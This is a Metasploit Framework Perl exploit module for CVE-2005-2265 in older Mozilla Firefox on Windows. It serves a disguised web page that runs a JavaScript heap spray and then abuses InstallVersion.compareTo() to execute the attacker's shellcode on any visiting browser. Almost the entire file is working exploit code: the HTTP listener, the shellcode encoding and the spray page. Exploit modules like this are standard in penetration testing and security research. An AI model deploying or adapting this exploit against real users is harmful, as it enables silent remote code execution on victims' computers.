##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::mozilla_compareto;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;

my $advanced = { };

my $info =
{
'Name' => 'Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution',
'Version' => '$Revision: 1.3 $',
'Authors' =>
[
'Aviv Raff <avivra [at] gmail.com>',
'H D Moore <hdm [at] metasploit.com>',
],

'Description' =>
Pex::Text::Freeform(qq{
This module exploits a code execution vulnerability in the Mozilla
Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit
module is a direct port of Aviv Raff's HTML PoC.
}),

'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 0,

'UserOpts' =>
{
'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
},

'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00",
'Keys' => ['-bind'],
},
'Refs' =>
[
['BID', '14242'],
['OSVDB', '17968'],
['CVE', '2005-2265'],
['URL', 'http://www.mozilla.org/security/announce/mfsa2005-50.html'],
],

'DefaultTarget' => 0,
'Targets' =>
[
[ 'Mozilla Firefox < 1.0.5 for Windows', 0x12000000, 0x11C0002C, 0x1200002C, 0x1180002C ]
],

'Keys' => [ 'mozilla' ],

'DisclosureDate' => 'Jul 13 2005',
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit
{
my $self = shift;
my $server = IO::Socket::INET->new(
LocalHost => $self->GetVar('HTTPHOST'),
LocalPort => $self->GetVar('HTTPPORT'),
ReuseAddr => 1,
Listen => 1,
Proto => 'tcp'
);
my $client;

# Did the listener create fail?
if (not defined($server)) {
$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
return;
}

my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
Pex::Utils::SourceIP('1.2.3.4') :
$self->GetVar('HTTPHOST');

$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");

while (defined($client = $server->accept())) {
$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
}

return;
}

sub HandleHttpClient
{
my $self = shift;
my $fd = shift;

# Set the remote host information
my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);

# Read the HTTP command
my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);

$self->PrintLine("[*] HTTP Client connected from $rhost:$rport, sending payload...");

my $content = $self->GenerateHTML();

# Transmit the HTTP response
my $req =
"HTTP/1.0 200 OK\r\n" .
"Content-Type: text/html\r\n" .
"Content-Length: " . length($content) . "\r\n" .
"Connection: close\r\n" .
"\r\n" .
$content;

my $res = $fd->Send($req);

$fd->Close();
}

sub JSUnescape {
my $self = shift;
my $data = shift;
my $code = '';

# Encode the shellcode via %u sequences for JS's unescape() function
my $idx = 0;
while ($idx < length($data) - 1) {
my $c1 = ord(substr($data, $idx, 1));
my $c2 = ord(substr($data, $idx+1, 1));
$code .= sprintf('%%u%.2x%.2x', $c2, $c1);
$idx += 2;
}

return $code;
}

sub GenerateHTML {
my $self = shift;
my $target = $self->Targets->[$self->GetVar('TARGET')];

my $shellcode = $self->JSUnescape($self->GetVar('EncodedPayload')->Payload);
my $sprayTo = sprintf("0x%.8x", $target->[1]);
my $spraySlide1 = $self->JSUnescape(pack('V', $target->[2]));
my $spraySlide2 = $self->JSUnescape(pack('V', $target->[3]));
my $eaxAddress = sprintf("0x%.8x", $target->[4]);

my $data = qq#
<html>
<head>
<!--
Copyright (C) 2005-2006 Aviv Raff (with minor modifications by HDM for the MSF module)
From: http://aviv.raffon.net/2005/12/11/MozillaUnderestimateVulnerabilityYetAgainPlus
OldVulnerabilityNewExploit.aspx
Greets: SkyLined, The Insider and shutdown
-->
<title>One second please...</title>
<script language="javascript">

function BodyOnLoad()
{
location.href="javascript:void (new InstallVersion());";
CrashAndBurn();
};

// The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology
function CrashAndBurn()
{
// Spray up to this address
var heapSprayToAddress=$sprayTo;

// Payload - Just return..
var payLoadCode=unescape("$shellcode");

// Size of the heap blocks
var heapBlockSize=0x400000;

// Size of the payload in bytes
var payLoadSize=payLoadCode.length * 2;

// Caluclate spray slides size
var spraySlideSize=heapBlockSize-(payLoadSize+0x38); // exclude header

// Set first spray slide ("pdata") with "pvtbl" fake address - 0x11C0002C
var spraySlide1 = unescape("$spraySlide1");

spraySlide1 = getSpraySlide(spraySlide1,spraySlideSize);

var spraySlide2 = unescape("$spraySlide2"); //0x1200002C

spraySlide2 = getSpraySlide(spraySlide2,spraySlideSize);

var spraySlide3 = unescape("\%u9090\%u9090");
spraySlide3 = getSpraySlide(spraySlide3,spraySlideSize);

// Spray the heap
heapBlocks=(heapSprayToAddress-0x400000)/heapBlockSize;
//alert(spraySlide2.length); return;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i]=(i\%3==0) ? spraySlide1 + payLoadCode:
(i\%3==1) ? spraySlide2 + payLoadCode: spraySlide3 + payLoadCode;
}

// Set address to fake "pdata".
var eaxAddress = $eaxAddress;
// This was taken from shutdown's PoC in bugzilla
// struct vtbl { void (*code)(void); };
// struct data { struct vtbl *pvtbl; };
//
// struct data *pdata = (struct data *)(xxAddress & ~0x01);
// pdata->pvtbl->code(pdata);
//
(new InstallVersion).compareTo(new Number(eaxAddress >> 1));
}

function getSpraySlide(spraySlide, spraySlideSize) {
while (spraySlide.length*2<spraySlideSize)
{
spraySlide+=spraySlide;
}
spraySlide=spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

// -->
</script>
</head>
<body onload="BodyOnLoad()">
</body>
</html>
#;
}